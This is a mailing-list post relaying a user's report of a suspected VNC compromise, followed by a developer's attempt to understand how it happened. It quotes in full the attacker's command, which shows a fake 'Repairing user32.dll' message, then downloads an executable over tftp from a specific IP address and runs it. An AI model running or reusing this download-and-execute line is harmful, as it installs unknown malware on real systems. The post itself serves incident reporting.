Don't use VNC (or know what it is)* ? - ignore this __________ I don't know whether this is significant but it sounds so. VNC users may wish to take note. Russell _______________________ >>>>> Eusebio wrote: > My pc (xp pro sp2) is usually on and connected, and I often use > tight-vnc, everything OK till I found this (see image) > > Someone executed this code: %comspec% /c echo Repairing user32.dll > echo Please wait... & tftp -i 64.79.213.12 GET > jijrtyw.exe & start jijrtyw& > > as a server address in 'TightVNC Viewer', appears an error message: > "Failed to get server address" > > but a cmd.exe window was open and that code was executed I'm trying to investigate this issue, but I do not understand yet how that could be possible. Do you have other VNC versions installed? Specifically, could it be possible that you run RealVNC's version 4.1.1? While searching the Internet, I was able to find a number of reports similar to this one (even the IP address was the same in many cases), but what was strange is that versions and distributions of VNC software were different in different reports - TightVNC, UltraVNC, VNC4. Another strange thing is that VNC viewer is involved, while VNC server is needed to connect to the machine. Are both server and viewer vulnerable? -- I think that's not likely. Looks very strange... -- http://www.piclist.com PIC/SX FAQ & list archive View/change your membership options at http://mailman.mit.edu/mailman/listinfo/piclist